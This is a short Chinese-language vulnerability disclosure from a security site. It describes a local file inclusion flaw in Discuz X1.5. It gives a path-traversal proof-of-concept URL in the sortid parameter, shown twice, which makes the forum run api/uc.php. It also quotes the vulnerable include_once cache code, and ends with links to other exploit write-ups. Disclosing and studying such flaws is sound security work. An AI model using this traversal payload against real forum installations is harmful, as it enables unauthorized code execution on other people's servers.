DISCUZ X1.5 本地文件包含漏洞说明
时间:2011-03-04 11:21:18 魔新豆网
config_global.php
地址:
http://localhost:8080/bbs/forum.php?mod=post&action=threadsorts&sortid=ygjgj/../../../api/uc
http://localhost:8080/bbs/forum.php?mod=post&action=threadsorts&sortid=ygjgj/../../../api/ucAuthracation has expiried
执行了 api/uc.php 页面代码了。
作者: Jannock
复制代码
$_config['cache']['type'] = ‘file’;
function cachedata($cachenames) {
……
$isfilecache = getglobal(‘config/cache/type’) == ‘file’;
……
if($isfilecache) {
$lostcaches = array();
foreach($cachenames as $cachename) {
if(!@include_once(DISCUZ_ROOT.’./data/cache/cache_’.$cachename.’.php’)) {
$lostcaches[] = $cachename;
}
}
……
}
地址:
http://localhost:8080/bbs/forum.php?mod=post&action=threadsorts&sortid=ygjgj/../../../api/uc
http://localhost:8080/bbs/forum.php?mod=post&action=threadsorts&sortid=ygjgj/../../../api/ucAuthracation has expiried
执行了 api/uc.php 页面代码了。
作者: Jannock
本文标签:
读过此篇文章的网友还读过:
- 分析国外黑客发现的海康威视远程系统XXE漏洞
- phpMyAdmin table参数SQL注入漏洞
- 容易被黑客攻击的10个漏洞
- 关于FCK编辑器漏洞爆绝对路径的问题及解决方法
- AceNet AceRepoter软件的简单漏洞分析(图文)
- 网站防范 "上传漏洞"入侵的方法
- DEDECMS网站管理系统模板执行漏洞(影响版本v5.6)
- IPC$ 扫描和IPC$漏洞的防范小结
- dedecms v5.6 GBK 注入漏洞利用(member/index.php)
- PHP 双字节、宽字节编码漏洞
- phpcms SQL注入漏洞 adsclass.php 页面过滤不严
- DedeCms注入漏洞 影响版本5.3、5.5Posted in php